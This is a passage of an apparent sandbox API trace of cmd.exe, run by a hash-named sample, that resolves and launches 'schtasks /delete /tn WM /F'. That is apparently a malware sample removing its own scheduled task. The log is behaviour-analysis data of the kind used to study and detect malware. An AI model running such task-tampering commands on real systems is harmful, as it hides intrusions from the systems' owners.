lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0141.973] GetProcessHeap () returned 0x510000 [0141.973] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5105c8) returned 1 [0141.974] GetProcessHeap () returned 0x510000 [0141.974] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x400e) returned 0x51bc50 [0141.974] GetProcessHeap () returned 0x510000 [0141.974] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x48) returned 0x51a7d0 [0141.974] GetProcessHeap () returned 0x510000 [0141.974] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x4008) returned 0x51fc68 [0141.975] GetProcessHeap () returned 0x510000 [0141.975] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x4008) returned 0x523c78 [0141.976] _wcsnicmp (_String1="scht", _String2="cmd ", _MaxCount=0x4) returned 16 [0141.976] GetProcessHeap () returned 0x510000 [0141.976] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x418) returned 0x51a820 [0141.977] SetErrorMode (uMode=0x0) returned 0x8003 [0141.977] SetErrorMode (uMode=0x1) returned 0x0 [0141.977] GetFullPathNameW (in: lpFileName="schtasks \\delete \\tn WM \\.", nBufferLength=0x208, lpBuffer=0x51a828, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\schtasks \\delete \\tn WM", lpFilePart=0x19fbac*="tn WM") returned 0x35 [0141.977] SetErrorMode (uMode=0x8003) returned 0x1 [0141.977] GetProcessHeap () returned 0x510000 [0141.977] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x51a820, Size=0x7a) returned 0x51a820 [0141.977] GetProcessHeap () returned 0x510000 [0141.977] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x51a820) returned 0x7a [0141.977] NeedCurrentDirectoryForExePathW (ExeName="schtasks \\delete \\tn WM \\.") returned 1 [0141.977] GetProcessHeap () returned 0x510000 [0141.977] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x7a) returned 0x51a8a8 [0141.977] GetProcessHeap () returned 0x510000 [0141.977] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xe8) returned 0x51a930 [0141.977] GetProcessHeap () returned 0x510000 [0141.977] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x51a930, Size=0x7a) returned 0x51a930 [0141.977] GetProcessHeap () returned 0x510000 [0141.978] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x51a930) returned 0x7a [0141.978] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0141.978] GetProcessHeap () returned 0x510000 [0141.978] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xe0) returned 0x51a9b8 [0141.982] GetProcessHeap () returned 0x510000 [0141.982] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x51a9b8, Size=0x76) returned 0x51a9b8 [0141.982] GetProcessHeap () returned 0x510000 [0141.982] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x51a9b8) returned 0x76 [0141.982] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.982] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\schtasks \\delete \\tn WM\\F .*", fInfoLevelId=0x1, lpFindFileData=0x19f938, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f938) returned 0xffffffff [0141.983] GetLastError () returned 0x3 [0141.983] GetProcessHeap () returned 0x510000 [0141.983] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x51fc68) returned 1 [0141.983] GetProcessHeap () returned 0x510000 [0141.983] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x523c78) returned 1 [0141.984] GetProcessHeap () returned 0x510000 [0141.984] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x51bc50) returned 1 [0141.984] GetConsoleOutputCP () returned 0x1b5 [0141.985] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0141.985] GetUserDefaultLCID () returned 0x409 [0141.986] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0141.986] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0141.986] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0141.986] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0141.986] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0141.986] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0141.986] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0141.986] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0141.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0141.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0141.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0141.987] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0141.987] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0141.987] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0141.987] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0141.989] GetProcessHeap () returned 0x510000 [0141.989] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x20c) returned 0x51aa80 [0141.989] GetConsoleTitleW (in: lpConsoleTitle=0x51aa80, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0141.990] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0141.990] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0141.990] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0141.990] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0141.990] GetProcessHeap () returned 0x510000 [0141.990] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x400a) returned 0x51bc50 [0141.990] GetProcessHeap () returned 0x510000 [0141.991] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x51bc50) returned 1 [0141.992] _wcsicmp (_String1="schtasks", _String2=")") returned 74 [0141.992] _wcsicmp (_String1="FOR", _String2="schtasks") returned -13 [0141.992] _wcsicmp (_String1="FOR/?", _String2="schtasks") returned -13 [0141.992] _wcsicmp (_String1="IF", _String2="schtasks") returned -10 [0141.992] _wcsicmp (_String1="IF/?", _String2="schtasks") returned -10 [0141.992] _wcsicmp (_String1="REM", _String2="schtasks") returned -1 [0141.992] _wcsicmp (_String1="REM/?", _String2="schtasks") returned -1 [0141.992] GetProcessHeap () returned 0x510000 [0141.992] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x58) returned 0x51ac98 [0141.992] GetProcessHeap () returned 0x510000 [0141.992] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x1a) returned 0x510578 [0141.993] GetProcessHeap () returned 0x510000 [0141.993] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x30) returned 0x51acf8 [0142.027] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0142.030] _wcsicmp (_String1="schtasks", _String2="DIR") returned 15 [0142.030] _wcsicmp (_String1="schtasks", _String2="ERASE") returned 14 [0142.030] _wcsicmp (_String1="schtasks", _String2="DEL") returned 15 [0142.030] _wcsicmp (_String1="schtasks", _String2="TYPE") returned -1 [0142.030] _wcsicmp (_String1="schtasks", _String2="COPY") returned 16 [0142.030] _wcsicmp (_String1="schtasks", _String2="CD") returned 16 [0142.030] _wcsicmp (_String1="schtasks", _String2="CHDIR") returned 16 [0142.030] _wcsicmp (_String1="schtasks", _String2="RENAME") returned 1 [0142.030] _wcsicmp (_String1="schtasks", _String2="REN") returned 1 [0142.030] _wcsicmp (_String1="schtasks", _String2="ECHO") returned 14 [0142.030] _wcsicmp (_String1="schtasks", _String2="SET") returned -2 [0142.030] _wcsicmp (_String1="schtasks", _String2="PAUSE") returned 3 [0142.030] _wcsicmp (_String1="schtasks", _String2="DATE") returned 15 [0142.030] _wcsicmp (_String1="schtasks", _String2="TIME") returned -1 [0142.030] _wcsicmp (_String1="schtasks", _String2="PROMPT") returned 3 [0142.030] _wcsicmp (_String1="schtasks", _String2="MD") returned 6 [0142.030] _wcsicmp (_String1="schtasks", _String2="MKDIR") returned 6 [0142.030] _wcsicmp (_String1="schtasks", _String2="RD") returned 1 [0142.030] _wcsicmp (_String1="schtasks", _String2="RMDIR") returned 1 [0142.030] _wcsicmp (_String1="schtasks", _String2="PATH") returned 3 [0142.031] _wcsicmp (_String1="schtasks", _String2="GOTO") returned 12 [0142.031] _wcsicmp (_String1="schtasks", _String2="SHIFT") returned -5 [0142.031] _wcsicmp (_String1="schtasks", _String2="CLS") returned 16 [0142.031] _wcsicmp (_String1="schtasks", _String2="CALL") returned 16 [0142.031] _wcsicmp (_String1="schtasks", _String2="VERIFY") returned -3 [0142.031] _wcsicmp (_String1="schtasks", _String2="VER") returned -3 [0142.031] _wcsicmp (_String1="schtasks", _String2="VOL") returned -3 [0142.031] _wcsicmp (_String1="schtasks", _String2="EXIT") returned 14 [0142.031] _wcsicmp (_String1="schtasks", _String2="SETLOCAL") returned -2 [0142.031] _wcsicmp (_String1="schtasks", _String2="ENDLOCAL") returned 14 [0142.031] _wcsicmp (_String1="schtasks", _String2="TITLE") returned -1 [0142.031] _wcsicmp (_String1="schtasks", _String2="START") returned -17 [0142.031] _wcsicmp (_String1="schtasks", _String2="DPATH") returned 15 [0142.031] _wcsicmp (_String1="schtasks", _String2="KEYS") returned 8 [0142.031] _wcsicmp (_String1="schtasks", _String2="MOVE") returned 6 [0142.031] _wcsicmp (_String1="schtasks", _String2="PUSHD") returned 3 [0142.031] _wcsicmp (_String1="schtasks", _String2="POPD") returned 3 [0142.031] _wcsicmp (_String1="schtasks", _String2="ASSOC") returned 18 [0142.031] _wcsicmp (_String1="schtasks", _String2="FTYPE") returned 13 [0142.031] _wcsicmp (_String1="schtasks", _String2="BREAK") returned 17 [0142.031] _wcsicmp (_String1="schtasks", _String2="COLOR") returned 16 [0142.031] _wcsicmp (_String1="schtasks", _String2="MKLINK") returned 6 [0142.031] _wcsicmp (_String1="schtasks", _String2="DIR") returned 15 [0142.031] _wcsicmp (_String1="schtasks", _String2="ERASE") returned 14 [0142.031] _wcsicmp (_String1="schtasks", _String2="DEL") returned 15 [0142.031] _wcsicmp (_String1="schtasks", _String2="TYPE") returned -1 [0142.031] _wcsicmp (_String1="schtasks", _String2="COPY") returned 16 [0142.031] _wcsicmp (_String1="schtasks", _String2="CD") returned 16 [0142.031] _wcsicmp (_String1="schtasks", _String2="CHDIR") returned 16 [0142.031] _wcsicmp (_String1="schtasks", _String2="RENAME") returned 1 [0142.031] _wcsicmp (_String1="schtasks", _String2="REN") returned 1 [0142.032] _wcsicmp (_String1="schtasks", _String2="ECHO") returned 14 [0142.032] _wcsicmp (_String1="schtasks", _String2="SET") returned -2 [0142.032] _wcsicmp (_String1="schtasks", _String2="PAUSE") returned 3 [0142.032] _wcsicmp (_String1="schtasks", _String2="DATE") returned 15 [0142.032] _wcsicmp (_String1="schtasks", _String2="TIME") returned -1 [0142.032] _wcsicmp (_String1="schtasks", _String2="PROMPT") returned 3 [0142.032] _wcsicmp (_String1="schtasks", _String2="MD") returned 6 [0142.032] _wcsicmp (_String1="schtasks", _String2="MKDIR") returned 6 [0142.032] _wcsicmp (_String1="schtasks", _String2="RD") returned 1 [0142.032] _wcsicmp (_String1="schtasks", _String2="RMDIR") returned 1 [0142.032] _wcsicmp (_String1="schtasks", _String2="PATH") returned 3 [0142.032] _wcsicmp (_String1="schtasks", _String2="GOTO") returned 12 [0142.032] _wcsicmp (_String1="schtasks", _String2="SHIFT") returned -5 [0142.032] _wcsicmp (_String1="schtasks", _String2="CLS") returned 16 [0142.032] _wcsicmp (_String1="schtasks", _String2="CALL") returned 16 [0142.032] _wcsicmp (_String1="schtasks", _String2="VERIFY") returned -3 [0142.032] _wcsicmp (_String1="schtasks", _String2="VER") returned -3 [0142.032] _wcsicmp (_String1="schtasks", _String2="VOL") returned -3 [0142.032] _wcsicmp (_String1="schtasks", _String2="EXIT") returned 14 [0142.032] _wcsicmp (_String1="schtasks", _String2="SETLOCAL") returned -2 [0142.032] _wcsicmp (_String1="schtasks", _String2="ENDLOCAL") returned 14 [0142.032] _wcsicmp (_String1="schtasks", _String2="TITLE") returned -1 [0142.032] _wcsicmp (_String1="schtasks", _String2="START") returned -17 [0142.032] _wcsicmp (_String1="schtasks", _String2="DPATH") returned 15 [0142.032] _wcsicmp (_String1="schtasks", _String2="KEYS") returned 8 [0142.032] _wcsicmp (_String1="schtasks", _String2="MOVE") returned 6 [0142.032] _wcsicmp (_String1="schtasks", _String2="PUSHD") returned 3 [0142.032] _wcsicmp (_String1="schtasks", _String2="POPD") returned 3 [0142.032] _wcsicmp (_String1="schtasks", _String2="ASSOC") returned 18 [0142.032] _wcsicmp (_String1="schtasks", _String2="FTYPE") returned 13 [0142.033] _wcsicmp (_String1="schtasks", _String2="BREAK") returned 17 [0142.033] _wcsicmp (_String1="schtasks", _String2="COLOR") returned 16 [0142.033] _wcsicmp (_String1="schtasks", _String2="MKLINK") returned 6 [0142.033] _wcsicmp (_String1="schtasks", _String2="FOR") returned 13 [0142.033] _wcsicmp (_String1="schtasks", _String2="IF") returned 10 [0142.033] _wcsicmp (_String1="schtasks", _String2="REM") returned 1 [0142.033] GetProcessHeap () returned 0x510000 [0142.033] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x210) returned 0x51ad30 [0142.033] GetProcessHeap () returned 0x510000 [0142.033] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x42) returned 0x51af48 [0142.033] _wcsnicmp (_String1="scht", _String2="cmd ", _MaxCount=0x4) returned 16 [0142.034] GetProcessHeap () returned 0x510000 [0142.034] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x418) returned 0x5105c8 [0142.034] SetErrorMode (uMode=0x0) returned 0x8003 [0142.034] SetErrorMode (uMode=0x1) returned 0x0 [0142.034] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x5105d0, lpFilePart=0x19f57c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19f57c*="Desktop") returned 0x1d [0142.034] SetErrorMode (uMode=0x8003) returned 0x1 [0142.034] GetProcessHeap () returned 0x510000 [0142.034] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x5105c8, Size=0x56) returned 0x5105c8 [0142.034] GetProcessHeap () returned 0x510000 [0142.034] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x5105c8) returned 0x56 [0142.034] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0142.034] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0142.034] GetProcessHeap () returned 0x510000 [0142.034] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x110) returned 0x51af98 [0142.034] GetProcessHeap () returned 0x510000 [0142.034] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x218) returned 0x510628 [0142.039] GetProcessHeap () returned 0x510000 [0142.039] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x510628, Size=0x112) returned 0x510628 [0142.039] GetProcessHeap () returned 0x510000 [0142.039] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x510628) returned 0x112 [0142.039] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0142.039] GetProcessHeap () returned 0x510000 [0142.039] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xe0) returned 0x51b0b0 [0142.041] GetProcessHeap () returned 0x510000 [0142.041] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x51b0b0, Size=0x76) returned 0x51b0b0 [0142.042] GetProcessHeap () returned 0x510000 [0142.042] RtlSizeHeap (HeapHandle=0x510000, Flags=0x0, MemoryPointer=0x51b0b0) returned 0x76 [0142.042] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0142.042] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\schtasks.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0142.049] GetLastError () returned 0x2 [0142.049] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0142.049] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.*", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x51b130 [0142.049] GetProcessHeap () returned 0x510000 [0142.049] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x14) returned 0x517668 [0142.049] FindClose (in: hFindFile=0x51b130 | out: hFindFile=0x51b130) returned 1 [0142.049] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.COM", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0xffffffff [0142.049] GetLastError () returned 0x2 [0142.049] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\schtasks.EXE", fInfoLevelId=0x1, lpFindFileData=0x19f308, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f308) returned 0x51b130 [0142.050] GetProcessHeap () returned 0x510000 [0142.050] RtlReAllocateHeap (Heap=0x510000, Flags=0x0, Ptr=0x517668, Size=0x4) returned 0x51b170 [0142.050] FindClose (in: hFindFile=0x51b130 | out: hFindFile=0x51b130) returned 1 [0142.050] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0142.050] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0142.050] GetConsoleTitleW (in: lpConsoleTitle=0x19f7fc, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0142.051] InitializeProcThreadAttributeList (in: lpAttributeList=0x19f728, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x19f70c | out: lpAttributeList=0x19f728, lpSize=0x19f70c) returned 1 [0142.051] UpdateProcThreadAttribute (in: lpAttributeList=0x19f728, dwFlags=0x0, Attribute=0x60001, lpValue=0x19f714, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x19f728, lpPreviousValue=0x0) returned 1 [0142.051] GetStartupInfoW (in: lpStartupInfo=0x19f760 | out: lpStartupInfo=0x19f760*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x130, hStdOutput=0x13c, hStdError=0x140)) [0142.051] GetProcessHeap () returned 0x510000 [0142.051] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x18) returned 0x5175c8 [0142.051] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0142.051] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0142.051] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0142.052] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0142.052] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0142.052] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0142.052] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0142.052] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0142.052] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0142.052] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0142.052] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0142.052] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0142.052] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0142.052] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0142.052] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0142.052] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0142.052] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.052] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.052] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.052] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.052] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0142.052] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0142.052] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0142.052] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0142.052] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0142.052] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0142.052] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0142.052] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0142.052] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0142.052] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0142.052] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0142.052] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0142.052] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0142.053] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0142.053] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0142.053] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0142.053] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0142.053] GetProcessHeap () returned 0x510000 [0142.053] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x5175c8) returned 1 [0142.053] GetProcessHeap () returned 0x510000 [0142.053] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xa) returned 0x51b130 [0142.053] lstrcmpW (lpString1="\\schtasks.exe", lpString2="\\XCOPY.EXE") returned -1 [0142.056] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\schtasks.exe", lpCommandLine="schtasks /delete /tn WM /F ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpStartupInfo=0x19f6b0*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="schtasks /delete /tn WM /F ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f6fc | out: lpCommandLine="schtasks /delete /tn WM /F ", lpProcessInformation=0x19f6fc*(hProcess=0x9c, hThread=0x98, dwProcessId=0xc54, dwThreadId=0xcc4)) returned 1 [0142.390] CloseHandle (hObject=0x98) returned 1 [0142.391] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0142.391] GetProcessHeap () returned 0x510000 [0142.391] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x519d50) returned 1 [0142.391] GetEnvironmentStringsW () returned 0x519d50* [0142.391] GetProcessHeap () returned 0x510000 [0142.391] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xa76) returned 0x517cc0 [0142.392] FreeEnvironmentStringsA (penv="=") returned 1 [0142.392] WaitForSingleObject (hHandle=0x9c, dwMilliseconds=0xffffffff) returned 0x0 [0143.379] GetExitCodeProcess (in: hProcess=0x9c, lpExitCode=0x19f694 | out: lpExitCode=0x19f694*=0x1) returned 1 [0143.379] CloseHandle (hObject=0x9c) returned 1 [0143.380] _vsnwprintf (in: _Buffer=0x19f77c, _BufferCount=0x13, _Format="%08X", _ArgList=0x19f69c | out: _Buffer="00000001") returned 8 [0143.380] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0143.381] GetProcessHeap () returned 0x510000 [0143.382] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x517cc0) returned 1 [0143.382] GetEnvironmentStringsW () returned 0x51b180* [0143.382] GetProcessHeap () returned 0x510000 [0143.382] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xa9c) returned 0x517cc0 [0143.382] FreeEnvironmentStringsA (penv="=") returned 1 [0143.382] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0143.382] GetProcessHeap () returned 0x510000 [0143.382] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x517cc0) returned 1 [0143.382] GetEnvironmentStringsW () returned 0x51b180* [0143.382] GetProcessHeap () returned 0x510000 [0143.382] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xa9c) returned 0x517cc0 [0143.383] FreeEnvironmentStringsA (penv="=") returned 1 [0143.383] GetProcessHeap () returned 0x510000 [0143.383] RtlFreeHeap (HeapHandle=0x510000, Flags=0x0, BaseAddress=0x51b130) returned 1 [0143.383] DeleteProcThreadAttributeList (in: lpAttributeList=0x19f728 | out: lpAttributeList=0x19f728) [0143.383] _get_osfhandle (_FileHandle=1) returned 0x13c [0143.383] SetConsoleMode (hConsoleHandle=0x13c, dwMode=0x0) returned 0 [0143.383] _get_osfhandle (_FileHandle=1) returned 0x13c [0143.383] GetConsoleMode (in: hConsoleHandle=0x13c, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0143.383] _get_osfhandle (_FileHandle=0) returned 0x130 [0143.383] GetConsoleMode (in: hConsoleHandle=0x130, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0143.383] GetConsoleOutputCP () returned 0x1b5 [0143.385] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0143.386] SetThreadUILanguage (LangId=0x0) returned 0x409 [0143.389] exit (_Code=1) Thread: id = 118 os_tid = 0xc68 Process: id = 